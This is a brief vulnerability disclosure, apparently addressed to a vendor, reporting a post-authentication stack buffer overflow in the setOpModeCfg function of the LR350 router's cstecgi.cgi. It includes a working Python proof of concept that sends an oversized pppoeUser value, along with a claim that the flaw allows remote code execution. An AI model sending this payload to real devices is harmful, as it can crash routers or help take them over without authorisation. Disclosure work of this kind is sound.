Hi, we found a post-authentication stack buffer overflow at **LR350 (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.

In function setOpModeCfg of the file /cgi-bin/cstecgi.cgi , the size of pppoeUser is not checked, and directly copy to stack via sprintf

Untitled

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'topicurl' : "setOpModeCfg",
"proto" : "3",
"switchOpMode" : "1",
"pppoeSpecType" : "2",
"pppoeUser" : "a"*0x1000}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

Untitled

The PC register can be hijacked, which means it can result in RCE.